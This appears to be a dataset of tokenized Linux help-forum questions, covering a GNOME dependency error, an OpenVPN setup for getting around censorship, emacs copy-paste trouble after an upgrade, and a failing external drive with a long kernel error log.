470014	gnome issue on ubuntu 14.04	i want to install gnome on my ubuntu 14.04 this is the error it gave me . sudo apt-get install gnome reading package lists ... done building dependency tree reading state information ... done gnome is already the newest version . you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : gimp : depends : libwebkitgtk-1.0-0 ( > = 1.3.10 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
470017	how to set up a vpn connection for both traffic encryption and secure point-to-point access to a remote server ?	i live in a country ( ussr ) that does internet censorship , but does n't ( yet ? ) go so far as to shut off foreign internet altogether , implement `` white-list '' great chinese firewall or ban encryption . i would like to set up a vpn connection on my home router and rented foreign vps server ( say , in helsinki ) with openvpn to fully encrypt traffic and safely and reliably circumvent the censorship systems . the thing is , while i 'm doing this , i could as well set up a point-to-point encrypted secure connection to my server in amsterdam . how should i set up a system for such use ? i am familiar with ubuntu and command-line . i think if i go into all the trouble , i could as well set up vpn on a home router ( i know it supports vpn ) , but could i set up vpn at the level of an individual computer or individual application ? b ) access a closed ( corporate ) network that only accepts outside connections through vpn . first and foremost i had ( a ) in mind , but now i think if i could have ( b ) as well . how do i set up a system for such case ? say i 'm in moscow , my vpn server is in helsinki and my server is in amsterdam . my connection goes encrypted from moscow to amsterdam , but my destination server is further yet , in amsterdam , so from the vpn endpoint onward it should go as a regular , unencrypted connection ; it would be better to have it encrypted all the way , but.. then i would n't need a server in helsinki , or would i ? i am somewhat familiar with linux , command line and server administration , just confused about how encryption works in this case . i use a home router that should support vpn for all my home devices nicely .
470019	emacs does n't kill-yank anymore after xubuntu upgrade to 14.04	i just upgraded xubuntu on my laptop from 13.10 to 14.04 . emacs ' version is 24.3.1 . everything is working fine except the kill-yank system ( copy-paste ) . to investigate this , i open emacs in my home ( `` cd ; emacs -nw '' ) , create a file ( `` c-x c-f test.txt '' ) , write a few dummy lines and kill-yank one of them ( `` c-space c-n esc-w '' ) . but when i enter the last command ( `` esc-w '' ) , the mini-buffer displays the following message : the mark is not set now , so there is no region i have no idea what is going on and how to fix this . any advice ? here are a few more remarks that can help find the cause of the problem : when i open emacs with a window ( that is , without option `` -nw '' ) , kill-yank still does n't work with the keyboard shortcuts ( as above ) , but it does work with the mouse my emacs profile ( `` ~/.emacs '' ) is here did n't change with the upgrade and does n't have anything related to kill-yank
470020	ext4 partition of a 1tb hdd keeps slowing down when in use	i have a 1tb hard disk that has 3 partitons , a 890 ext4 partition and 2 ntfs partitions that add upto around 70gb accessing the 2 ntfs partitions is fast and read and write operations on them are quite fast since its a usb 3.0 enabled hdd . however read and write operations on the ext4 partition are so slow so i run dmesg this in turn printed this to the console [ 7769.693141 ] add . sense : unrecovered read error [ 7769.693144 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7769.693146 ] read ( 10 ) : 28 00 50 bd 22 28 00 00 88 00 [ 7769.693159 ] end_request : critical target error , dev sdb , sector 1354572328 [ 7773.149864 ] sd 7:0:0:0 : [ sdb ] unhandled sense code [ 7773.149870 ] sd 7:0:0:0 : [ sdb ] [ 7773.149874 ] result : hostbyte=did_ok driverbyte=driver_sense [ 7773.149876 ] sd 7:0:0:0 : [ sdb ] [ 7773.149878 ] sense key : medium error [ current ] [ 7773.149883 ] sd 7:0:0:0 : [ sdb ] [ 7773.149887 ] add . sense : unrecovered read error [ 7773.149890 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7773.149892 ] read ( 10 ) : 28 00 50 bd 22 30 00 00 80 00 [ 7773.149904 ] end_request : critical target error , dev sdb , sector 1354572336 [ 7773.454267 ] ext4-fs error ( device sdb2 ) : __ext4_get_inode_loc:3920 : inode # 39584592 : block 158335060 : comm io_worker : unable to read itable block [ 7773.454384 ] ext4-fs error ( device sdb2 ) : __ext4_get_inode_loc:3920 : inode # 39584539 : block 158335057 : comm io_worker : unable to read itable block [ 7776.948093 ] sd 7:0:0:0 : [ sdb ] unhandled sense code [ 7776.948099 ] sd 7:0:0:0 : [ sdb ] [ 7776.948102 ] result : hostbyte=did_ok driverbyte=driver_sense [ 7776.948105 ] sd 7:0:0:0 : [ sdb ] [ 7776.948108 ] sense key : medium error [ current ] [ 7776.948113 ] sd 7:0:0:0 : [ sdb ] [ 7776.948117 ] add . sense : unrecovered read error [ 7776.948120 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7776.948122 ] read ( 10 ) : 28 00 50 bd 22 30 00 00 80 00 [ 7776.948135 ] end_request : critical target error , dev sdb , sector 1354572336 [ 7780.404482 ] sd 7:0:0:0 : [ sdb ] unhandled sense code [ 7780.404489 ] sd 7:0:0:0 : [ sdb ] [ 7780.404493 ] result : hostbyte=did_ok driverbyte=driver_sense [ 7780.404495 ] sd 7:0:0:0 : [ sdb ] [ 7780.404498 ] sense key : medium error [ current ] [ 7780.404502 ] sd 7:0:0:0 : [ sdb ] [ 7780.404506 ] add . sense : unrecovered read error [ 7780.404509 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7780.404511 ] read ( 10 ) : 28 00 50 bd 22 38 00 00 78 00 [ 7780.404523 ] end_request : critical target error , dev sdb , sector 1354572344 [ 7784.115579 ] sd 7:0:0:0 : [ sdb ] unhandled sense code [ 7784.115585 ] sd 7:0:0:0 : [ sdb ] [ 7784.115590 ] result : hostbyte=did_ok driverbyte=driver_sense [ 7784.115592 ] sd 7:0:0:0 : [ sdb ] [ 7784.115594 ] sense key : medium error [ current ] [ 7784.115600 ] sd 7:0:0:0 : [ sdb ] [ 7784.115603 ] add . sense : unrecovered read error [ 7784.115606 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7784.115608 ] read ( 10 ) : 28 00 50 bd 22 30 00 00 80 00 [ 7784.115620 ] end_request : critical target error , dev sdb , sector 1354572336 [ 7787.571712 ] sd 7:0:0:0 : [ sdb ] unhandled sense code [ 7787.571718 ] sd 7:0:0:0 : [ sdb ] [ 7787.571721 ] result : hostbyte=did_ok driverbyte=driver_sense [ 7787.571724 ] sd 7:0:0:0 : [ sdb ] [ 7787.571726 ] sense key : medium error [ current ] [ 7787.571731 ] sd 7:0:0:0 : [ sdb ] [ 7787.571734 ] add . sense : unrecovered read error [ 7787.571739 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7787.571740 ] read ( 10 ) : 28 00 50 bd 22 38 00 00 78 00 [ 7787.571752 ] end_request : critical target error , dev sdb , sector 1354572344 [ 7788.087740 ] ext4-fs error ( device sdb2 ) : __ext4_get_inode_loc:3920 : inode # 39584593 : block 158335061 : comm io_worker : unable to read itable block [ 7791.803832 ] sd 7:0:0:0 : [ sdb ] unhandled sense code [ 7791.803839 ] sd 7:0:0:0 : [ sdb ] [ 7791.803842 ] result : hostbyte=did_ok driverbyte=driver_sense [ 7791.803845 ] sd 7:0:0:0 : [ sdb ] [ 7791.803847 ] sense key : medium error [ current ] [ 7791.803854 ] sd 7:0:0:0 : [ sdb ] [ 7791.803860 ] add . sense : unrecovered read error [ 7791.803863 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7791.803865 ] read ( 10 ) : 28 00 50 bd 22 30 00 00 80 00 [ 7791.803877 ] end_request : critical target error , dev sdb , sector 1354572336 [ 7795.259959 ] sd 7:0:0:0 : [ sdb ] unhandled sense code [ 7795.259968 ] sd 7:0:0:0 : [ sdb ] [ 7795.259973 ] result : hostbyte=did_ok driverbyte=driver_sense [ 7795.259976 ] sd 7:0:0:0 : [ sdb ] [ 7795.259978 ] sense key : medium error [ current ] [ 7795.259983 ] sd 7:0:0:0 : [ sdb ] [ 7795.259987 ] add . sense : unrecovered read error [ 7795.259991 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7795.259993 ] read ( 10 ) : 28 00 50 bd 22 38 00 00 78 00 [ 7795.260030 ] end_request : critical target error , dev sdb , sector 1354572344 [ 7795.775987 ] ext4-fs error ( device sdb2 ) : __ext4_get_inode_loc:3920 : inode # 39584540 : block 158335057 : comm io_worker : unable to read itable block [ 7799.493077 ] sd 7:0:0:0 : [ sdb ] unhandled sense code [ 7799.493084 ] sd 7:0:0:0 : [ sdb ] [ 7799.493087 ] result : hostbyte=did_ok driverbyte=driver_sense [ 7799.493090 ] sd 7:0:0:0 : [ sdb ] [ 7799.493092 ] sense key : medium error [ current ] [ 7799.493097 ] sd 7:0:0:0 : [ sdb ] [ 7799.493100 ] add . sense : unrecovered read error [ 7799.493103 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7799.493105 ] read ( 10 ) : 28 00 50 bd 22 30 00 00 80 00 [ 7799.493118 ] end_request : critical target error , dev sdb , sector 1354572336 [ 7802.950208 ] sd 7:0:0:0 : [ sdb ] unhandled sense code [ 7802.950217 ] sd 7:0:0:0 : [ sdb ] [ 7802.950220 ] result : hostbyte=did_ok driverbyte=driver_sense [ 7802.950223 ] sd 7:0:0:0 : [ sdb ] [ 7802.950227 ] sense key : medium error [ current ] [ 7802.950233 ] sd 7:0:0:0 : [ sdb ] [ 7802.950237 ] add . sense : unrecovered read error [ 7802.950241 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7802.950243 ] read ( 10 ) : 28 00 50 bd 22 38 00 00 78 00 [ 7802.950255 ] end_request : critical target error , dev sdb , sector 1354572344 [ 7803.466224 ] ext4-fs error ( device sdb2 ) : __ext4_get_inode_loc:3920 : inode # 39584594 : block 158335061 : comm io_worker : unable to read itable block [ 7807.204108 ] sd 7:0:0:0 : [ sdb ] unhandled sense code [ 7807.204117 ] sd 7:0:0:0 : [ sdb ] [ 7807.204120 ] result : hostbyte=did_ok driverbyte=driver_sense [ 7807.204123 ] sd 7:0:0:0 : [ sdb ] [ 7807.204125 ] sense key : medium error [ current ] [ 7807.204130 ] sd 7:0:0:0 : [ sdb ] [ 7807.204134 ] add . sense : unrecovered read error [ 7807.204137 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7807.204139 ] read ( 10 ) : 28 00 50 bd 22 30 00 00 80 00 [ 7807.204151 ] end_request : critical target error , dev sdb , sector 1354572336 [ 7810.659447 ] sd 7:0:0:0 : [ sdb ] unhandled sense code [ 7810.659454 ] sd 7:0:0:0 : [ sdb ] [ 7810.659457 ] result : hostbyte=did_ok driverbyte=driver_sense [ 7810.659460 ] sd 7:0:0:0 : [ sdb ] [ 7810.659462 ] sense key : medium error [ current ] [ 7810.659466 ] sd 7:0:0:0 : [ sdb ] [ 7810.659471 ] add . sense : unrecovered read error [ 7810.659474 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7810.659476 ] read ( 10 ) : 28 00 50 bd 22 38 00 00 78 00 [ 7810.659488 ] end_request : critical target error , dev sdb , sector 1354572344 [ 7811.835495 ] ext4-fs error ( device sdb2 ) : __ext4_get_inode_loc:3920 : inode # 39584541 : block 158335057 : comm io_worker : unable to read itable block [ 7811.835502 ] ext4-fs error ( device sdb2 ) : __ext4_get_inode_loc:3920 : inode # 39584595 : block 158335061 : comm io_worker : unable to read itable block [ 7815.304601 ] sd 7:0:0:0 : [ sdb ] unhandled sense code [ 7815.304608 ] sd 7:0:0:0 : [ sdb ] [ 7815.304612 ] result : hostbyte=did_ok driverbyte=driver_sense [ 7815.304615 ] sd 7:0:0:0 : [ sdb ] [ 7815.304617 ] sense key : medium error [ current ] [ 7815.304622 ] sd 7:0:0:0 : [ sdb ] [ 7815.304625 ] add . sense : unrecovered read error [ 7815.304628 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7815.304630 ] read ( 10 ) : 28 00 50 bd 22 40 00 00 58 00 [ 7815.304642 ] end_request : critical target error , dev sdb , sector 1354572352 [ 7818.759707 ] sd 7:0:0:0 : [ sdb ] unhandled sense code [ 7818.759715 ] sd 7:0:0:0 : [ sdb ] [ 7818.759718 ] result : hostbyte=did_ok driverbyte=driver_sense [ 7818.759721 ] sd 7:0:0:0 : [ sdb ] [ 7818.759723 ] sense key : medium error [ current ] [ 7818.759730 ] sd 7:0:0:0 : [ sdb ] [ 7818.759733 ] add . sense : unrecovered read error [ 7818.759736 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7818.759738 ] read ( 10 ) : 28 00 50 bd 22 48 00 00 50 00 [ 7818.759750 ] end_request : critical target error , dev sdb , sector 1354572360 [ 7819.589770 ] ext4-fs error ( device sdb2 ) : __ext4_get_inode_loc:3920 : inode # 39584542 : block 158335057 : comm io_worker : unable to read itable block [ 7823.304851 ] sd 7:0:0:0 : [ sdb ] unhandled sense code [ 7823.304857 ] sd 7:0:0:0 : [ sdb ] [ 7823.304860 ] result : hostbyte=did_ok driverbyte=driver_sense [ 7823.304863 ] sd 7:0:0:0 : [ sdb ] [ 7823.304865 ] sense key : medium error [ current ] [ 7823.304870 ] sd 7:0:0:0 : [ sdb ] [ 7823.304873 ] add . sense : unrecovered read error [ 7823.304876 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7823.304878 ] read ( 10 ) : 28 00 50 bd 22 40 00 00 58 00 [ 7823.304890 ] end_request : critical target error , dev sdb , sector 1354572352 [ 7826.748964 ] sd 7:0:0:0 : [ sdb ] unhandled sense code [ 7826.748970 ] sd 7:0:0:0 : [ sdb ] [ 7826.748974 ] result : hostbyte=did_ok driverbyte=driver_sense [ 7826.748977 ] sd 7:0:0:0 : [ sdb ] [ 7826.748979 ] sense key : medium error [ current ] [ 7826.748984 ] sd 7:0:0:0 : [ sdb ] [ 7826.748987 ] add . sense : unrecovered read error [ 7826.748990 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7826.748992 ] read ( 10 ) : 28 00 50 bd 22 48 00 00 50 00 [ 7826.749004 ] end_request : critical target error , dev sdb , sector 1354572360 [ 7837.944047 ] usb 8-2 : reset full-speed usb device number 2 using uhci_hcd [ 7838.097319 ] usb 8-2 : parent hub missing lpm exit latency info . power management will be impacted . [ 7838.750363 ] ext4-fs error ( device sdb2 ) : __ext4_get_inode_loc:3920 : inode # 39584543 : block 158335057 : comm io_worker : unable to read itable block [ 7842.504495 ] sd 7:0:0:0 : [ sdb ] unhandled sense code [ 7842.504502 ] sd 7:0:0:0 : [ sdb ] [ 7842.504505 ] result : hostbyte=did_ok driverbyte=driver_sense [ 7842.504508 ] sd 7:0:0:0 : [ sdb ] [ 7842.504510 ] sense key : medium error [ current ] [ 7842.504516 ] sd 7:0:0:0 : [ sdb ] [ 7842.504519 ] add . sense : unrecovered read error [ 7842.504523 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7842.504525 ] read ( 10 ) : 28 00 50 bd 22 40 00 00 58 00 [ 7842.504538 ] end_request : critical target error , dev sdb , sector 1354572352 [ 7845.960618 ] sd 7:0:0:0 : [ sdb ] unhandled sense code [ 7845.960627 ] sd 7:0:0:0 : [ sdb ] [ 7845.960631 ] result : hostbyte=did_ok driverbyte=driver_sense [ 7845.960634 ] sd 7:0:0:0 : [ sdb ] [ 7845.960636 ] sense key : medium error [ current ] [ 7845.960642 ] sd 7:0:0:0 : [ sdb ] [ 7845.960645 ] add . sense : unrecovered read error [ 7845.960649 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7845.960651 ] read ( 10 ) : 28 00 50 bd 22 48 00 00 50 00 [ 7845.960663 ] end_request : critical target error , dev sdb , sector 1354572360 [ 7850.452095 ] usb 8-2 : reset full-speed usb device number 2 using uhci_hcd [ 7850.605722 ] usb 8-2 : parent hub missing lpm exit latency info . power management will be impacted . [ 7851.251791 ] ext4-fs error ( device sdb2 ) : __ext4_get_inode_loc:3920 : inode # 39584544 : block 158335057 : comm io_worker : unable to read itable block [ 7854.726872 ] sd 7:0:0:0 : [ sdb ] unhandled sense code [ 7854.726878 ] sd 7:0:0:0 : [ sdb ] [ 7854.726881 ] result : hostbyte=did_ok driverbyte=driver_sense [ 7854.726884 ] sd 7:0:0:0 : [ sdb ] [ 7854.726886 ] sense key : medium error [ current ] [ 7854.726892 ] sd 7:0:0:0 : [ sdb ] [ 7854.726895 ] add . sense : unrecovered read error [ 7854.726899 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7854.726900 ] read ( 10 ) : 28 00 50 bd 22 40 00 00 58 00 [ 7854.726913 ] end_request : critical target error , dev sdb , sector 1354572352 [ 7858.181983 ] sd 7:0:0:0 : [ sdb ] unhandled sense code [ 7858.181990 ] sd 7:0:0:0 : [ sdb ] [ 7858.181993 ] result : hostbyte=did_ok driverbyte=driver_sense [ 7858.181996 ] sd 7:0:0:0 : [ sdb ] [ 7858.181998 ] sense key : medium error [ current ] [ 7858.182004 ] sd 7:0:0:0 : [ sdb ] [ 7858.182007 ] add . sense : unrecovered read error [ 7858.182010 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7858.182012 ] read ( 10 ) : 28 00 50 bd 22 48 00 00 50 00 [ 7858.182024 ] end_request : critical target error , dev sdb , sector 1354572360 [ 7858.991053 ] ext4-fs error ( device sdb2 ) : __ext4_get_inode_loc:3920 : inode # 39584545 : block 158335058 : comm io_worker : unable to read itable block [ 7859.196065 ] usb 8-2 : reset full-speed usb device number 2 using uhci_hcd [ 7859.350018 ] usb 8-2 : parent hub missing lpm exit latency info . power management will be impacted . [ 7863.127150 ] sd 7:0:0:0 : [ sdb ] unhandled sense code [ 7863.127157 ] sd 7:0:0:0 : [ sdb ] [ 7863.127160 ] result : hostbyte=did_ok driverbyte=driver_sense [ 7863.127163 ] sd 7:0:0:0 : [ sdb ] [ 7863.127165 ] sense key : medium error [ current ] [ 7863.127171 ] sd 7:0:0:0 : [ sdb ] [ 7863.127174 ] add . sense : unrecovered read error [ 7863.127177 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7863.127179 ] read ( 10 ) : 28 00 50 bd 22 40 00 00 58 00 [ 7863.127191 ] end_request : critical target error , dev sdb , sector 1354572352 [ 7866.549255 ] sd 7:0:0:0 : [ sdb ] unhandled sense code [ 7866.549261 ] sd 7:0:0:0 : [ sdb ] [ 7866.549264 ] result : hostbyte=did_ok driverbyte=driver_sense [ 7866.549267 ] sd 7:0:0:0 : [ sdb ] [ 7866.549269 ] sense key : medium error [ current ] [ 7866.549274 ] sd 7:0:0:0 : [ sdb ] [ 7866.549277 ] add . sense : unrecovered read error [ 7866.549280 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7866.549282 ] read ( 10 ) : 28 00 50 bd 22 48 00 00 50 00 [ 7866.549293 ] end_request : critical target error , dev sdb , sector 1354572360 [ 7867.060049 ] usb 8-2 : reset full-speed usb device number 2 using uhci_hcd [ 7867.213261 ] usb 8-2 : parent hub missing lpm exit latency info . power management will be impacted . [ 7867.253293 ] ext4-fs error ( device sdb2 ) : __ext4_get_inode_loc:3920 : inode # 39584546 : block 158335058 : comm io_worker : unable to read itable block [ 7890.673063 ] sd 7:0:0:0 : [ sdb ] unhandled error code [ 7890.673072 ] sd 7:0:0:0 : [ sdb ] [ 7890.673075 ] result : hostbyte=did_error driverbyte=driver_ok [ 7890.673078 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7890.673080 ] read ( 10 ) : 28 00 50 3d 25 90 00 00 70 00 [ 7890.673093 ] end_request : i/o error , dev sdb , sector 1346184592 [ 7890.969111 ] ext4-fs error ( device sdb2 ) : __ext4_get_inode_loc:3920 : inode # 39323944 : block 157286578 : comm io_worker : unable to read itable block [ 7890.969121 ] ext4-fs error ( device sdb2 ) in ext4_reserve_inode_write:4841 : io failure [ 7891.091053 ] sd 7:0:0:0 : [ sdb ] unhandled error code [ 7891.091060 ] sd 7:0:0:0 : [ sdb ] [ 7891.091063 ] result : hostbyte=did_error driverbyte=driver_ok [ 7891.091066 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7891.091068 ] read ( 10 ) : 28 00 50 3d 24 08 00 00 f0 00 [ 7891.091081 ] end_request : i/o error , dev sdb , sector 1346184200 [ 7914.864062 ] usb 8-2 : reset full-speed usb device number 2 using uhci_hcd [ 7915.017814 ] usb 8-2 : parent hub missing lpm exit latency info . power management will be impacted . [ 7950.640995 ] sd 7:0:0:0 : [ sdb ] unhandled error code [ 7950.641002 ] sd 7:0:0:0 : [ sdb ] [ 7950.641005 ] result : hostbyte=did_error driverbyte=driver_ok [ 7950.641009 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7950.641011 ] read ( 10 ) : 28 00 0c 3d 22 10 00 00 b8 00 [ 7950.641024 ] end_request : i/o error , dev sdb , sector 205333008 [ 7951.125010 ] sd 7:0:0:0 : [ sdb ] unhandled error code [ 7951.125018 ] sd 7:0:0:0 : [ sdb ] [ 7951.125021 ] result : hostbyte=did_error driverbyte=driver_ok [ 7951.125024 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7951.125027 ] read ( 10 ) : 28 00 09 bd 37 08 00 00 08 00 [ 7951.125040 ] end_request : i/o error , dev sdb , sector 163395336 [ 7951.438018 ] sd 7:0:0:0 : [ sdb ] unhandled error code [ 7951.438025 ] sd 7:0:0:0 : [ sdb ] [ 7951.438029 ] result : hostbyte=did_error driverbyte=driver_ok [ 7951.438032 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7951.438034 ] read ( 10 ) : 28 00 09 fd 28 08 00 00 08 00 [ 7951.438046 ] end_request : i/o error , dev sdb , sector 167585800 [ 7951.505037 ] sd 7:0:0:0 : [ sdb ] unhandled error code [ 7951.505046 ] sd 7:0:0:0 : [ sdb ] [ 7951.505051 ] result : hostbyte=did_error driverbyte=driver_ok [ 7951.505057 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7951.505060 ] read ( 10 ) : 28 00 09 fd 28 b0 00 00 20 00 [ 7951.505081 ] end_request : i/o error , dev sdb , sector 167585968 [ 7951.797043 ] sd 7:0:0:0 : [ sdb ] unhandled error code [ 7951.797050 ] sd 7:0:0:0 : [ sdb ] [ 7951.797053 ] result : hostbyte=did_error driverbyte=driver_ok [ 7951.797056 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7951.797058 ] read ( 10 ) : 28 00 0a 7d 24 08 00 00 70 00 [ 7951.797071 ] end_request : i/o error , dev sdb , sector 175973384 [ 7952.590055 ] sd 7:0:0:0 : [ sdb ] unhandled error code [ 7952.590062 ] sd 7:0:0:0 : [ sdb ] [ 7952.590065 ] result : hostbyte=did_error driverbyte=driver_ok [ 7952.590068 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7952.590071 ] read ( 10 ) : 28 00 0c bd 21 08 00 00 b8 00 [ 7952.590084 ] end_request : i/o error , dev sdb , sector 213721352 [ 7952.952064 ] sd 7:0:0:0 : [ sdb ] unhandled error code [ 7952.952071 ] sd 7:0:0:0 : [ sdb ] [ 7952.952074 ] result : hostbyte=did_error driverbyte=driver_ok [ 7952.952077 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7952.952079 ] read ( 10 ) : 28 00 34 3d 26 50 00 00 08 00 [ 7952.952092 ] end_request : i/o error , dev sdb , sector 876422736 [ 7953.627111 ] sd 7:0:0:0 : [ sdb ] unhandled error code [ 7953.627118 ] sd 7:0:0:0 : [ sdb ] [ 7953.627122 ] result : hostbyte=did_error driverbyte=driver_ok [ 7953.627125 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7953.627128 ] read ( 10 ) : 28 00 38 fd 21 20 00 00 20 00 [ 7953.627141 ] end_request : i/o error , dev sdb , sector 956113184 [ 7953.729143 ] ext4-fs error ( device sdb2 ) : __ext4_get_inode_loc:3920 : inode # 27131972 : block 108527652 : comm io_worker : unable to read itable block [ 7954.969117 ] sd 7:0:0:0 : [ sdb ] unhandled error code [ 7954.969124 ] sd 7:0:0:0 : [ sdb ] [ 7954.969127 ] result : hostbyte=did_error driverbyte=driver_ok [ 7954.969130 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7954.969132 ] read ( 10 ) : 28 00 3a 3d 21 b0 00 00 10 00 [ 7954.969145 ] end_request : i/o error , dev sdb , sector 977084848 [ 7970.578650 ] sd 7:0:0:0 : [ sdb ] unhandled error code [ 7970.578657 ] sd 7:0:0:0 : [ sdb ] [ 7970.578660 ] result : hostbyte=did_error driverbyte=driver_ok [ 7970.578663 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7970.578665 ] read ( 10 ) : 28 00 0b bd 21 a8 00 00 58 00 [ 7970.578679 ] end_request : i/o error , dev sdb , sector 196944296 [ 7972.170146 ] sd 7:0:0:0 : [ sdb ] unhandled error code [ 7972.170152 ] sd 7:0:0:0 : [ sdb ] [ 7972.170155 ] result : hostbyte=did_error driverbyte=driver_ok [ 7972.170159 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7972.170161 ] read ( 10 ) : 28 00 4a fd 23 20 00 00 10 00 [ 7972.170174 ] end_request : i/o error , dev sdb , sector 1258103584 [ 7972.607698 ] sd 7:0:0:0 : [ sdb ] unhandled error code [ 7972.607707 ] sd 7:0:0:0 : [ sdb ] [ 7972.607710 ] result : hostbyte=did_error driverbyte=driver_ok [ 7972.607713 ] sd 7:0:0:0 : [ sdb ] cdb : [ 7972.607715 ] read ( 10 ) : 28 00 4a fd 22 70 00 00 08 00 [ 7972.607727 ] end_request : i/o error , dev sdb , sector 1258103408 [ 7987.590224 ] ext4-fs error ( device sdb2 ) : htree_dirblock_to_tree:920 : inode # 32 : block 1059883 : comm io_worker : bad entry in directory : rec_len % 4 ! = 0 - offset=0 ( 0 ) , inode=184801283 , rec_len=16126 , name_len=47 [ 8043.994026 ] sd 7:0:0:0 : [ sdb ] unhandled sense code [ 8043.994035 ] sd 7:0:0:0 : [ sdb ] [ 8043.994039 ] result : hostbyte=did_ok driverbyte=driver_sense [ 8043.994042 ] sd 7:0:0:0 : [ sdb ] [ 8043.994045 ] sense key : medium error [ current ] [ 8043.994050 ] sd 7:0:0:0 : [ sdb ] [ 8043.994054 ] add . sense : unrecovered read error [ 8043.994058 ] sd 7:0:0:0 : [ sdb ] cdb : [ 8043.994060 ] read ( 10 ) : 28 00 50 bd 22 40 00 00 c0 00 [ 8043.994073 ] end_request : critical target error , dev sdb , sector 1354572352 [ 8047.505163 ] sd 7:0:0:0 : [ sdb ] unhandled sense code [ 8047.505173 ] sd 7:0:0:0 : [ sdb ] [ 8047.505178 ] result : hostbyte=did_ok driverbyte=driver_sense [ 8047.505182 ] sd 7:0:0:0 : [ sdb ] [ 8047.505185 ] sense key : medium error [ current ] [ 8047.505193 ] sd 7:0:0:0 : [ sdb ] [ 8047.505198 ] add . sense : unrecovered read error [ 8047.505204 ] sd 7:0:0:0 : [ sdb ] cdb : [ 8047.505207 ] read ( 10 ) : 28 00 50 bd 22 48 00 00 b8 00 [ 8047.505227 ] end_request : critical target error , dev sdb , sector 1354572360 [ 8050.321250 ] sd 7:0:0:0 : [ sdb ] unhandled error code [ 8050.321260 ] sd 7:0:0:0 : [ sdb ] [ 8050.321266 ] result : hostbyte=did_error driverbyte=driver_ok [ 8050.321271 ] sd 7:0:0:0 : [ sdb ] cdb : [ 8050.321274 ] read ( 10 ) : 28 00 73 88 06 80 00 00 20 00 [ 8050.321294 ] end_request : i/o error , dev sdb , sector 1938294400 [ 8087.116683 ] usb 8-2 : reset full-speed usb device number 2 using uhci_hcd [ 8087.269417 ] usb 8-2 : parent hub missing lpm exit latency info . power management will be impacted . [ 8093.867663 ] sd 7:0:0:0 : [ sdb ] unhandled error code [ 8093.867671 ] sd 7:0:0:0 : [ sdb ] [ 8093.867675 ] result : hostbyte=did_error driverbyte=driver_ok [ 8093.867678 ] sd 7:0:0:0 : [ sdb ] cdb : [ 8093.867680 ] read ( 10 ) : 28 00 4c 7d 26 10 00 00 f0 00 [ 8093.867695 ] end_request : i/o error , dev sdb , sector 1283270160 [ 8094.526681 ] sd 7:0:0:0 : [ sdb ] unhandled error code [ 8094.526688 ] sd 7:0:0:0 : [ sdb ] [ 8094.526691 ] result : hostbyte=did_error driverbyte=driver_ok [ 8094.526694 ] sd 7:0:0:0 : [ sdb ] cdb : [ 8094.526696 ] read ( 10 ) : 28 00 4c 7d 28 10 00 00 f0 00 [ 8094.526709 ] end_request : i/o error , dev sdb , sector 1283270672 [ 8110.316043 ] usb 8-2 : reset full-speed usb device number 2 using uhci_hcd [ 8110.469181 ] usb 8-2 : parent hub missing lpm exit latency info . power management will be impacted . [ 8113.653301 ] ext4-fs error ( device sdb2 ) : ext4_lookup:1437 : inode # 823 : comm io_worker : deleted inode referenced : 14 [ 8113.913351 ] ext4-fs error ( device sdb2 ) : ext4_lookup:1437 : inode # 823 : comm io_worker : deleted inode referenced : 15 [ 8122.071555 ] sd 7:0:0:0 : [ sdb ] unhandled sense code [ 8122.071561 ] sd 7:0:0:0 : [ sdb ] [ 8122.071565 ] result : hostbyte=did_ok driverbyte=driver_sense [ 8122.071567 ] sd 7:0:0:0 : [ sdb ] [ 8122.071569 ] sense key : medium error [ current ] [ 8122.071574 ] sd 7:0:0:0 : [ sdb ] [ 8122.071577 ] add . sense : unrecovered read error [ 8122.071580 ] sd 7:0:0:0 : [ sdb ] cdb : [ 8122.071581 ] read ( 10 ) : 28 00 50 bd 22 40 00 00 c0 00 [ 8122.071593 ] end_request : critical target error , dev sdb , sector 1354572352 [ 8125.816708 ] sd 7:0:0:0 : [ sdb ] unhandled sense code [ 8125.816719 ] sd 7:0:0:0 : [ sdb ] [ 8125.816723 ] result : hostbyte=did_ok driverbyte=driver_sense [ 8125.816728 ] sd 7:0:0:0 : [ sdb ] [ 8125.816732 ] sense key : medium error [ current ] [ 8125.816740 ] sd 7:0:0:0 : [ sdb ] [ 8125.816745 ] add . sense : unrecovered read error [ 8125.816751 ] sd 7:0:0:0 : [ sdb ] cdb : [ 8125.816755 ] read ( 10 ) : 28 00 50 bd 22 40 00 00 c0 00 [ 8125.816774 ] end_request : critical target error , dev sdb , sector 1354572352 [ 8129.327788 ] sd 7:0:0:0 : [ sdb ] unhandled sense code [ 8129.327795 ] sd 7:0:0:0 : [ sdb ] [ 8129.327798 ] result : hostbyte=did_ok driverbyte=driver_sense [ 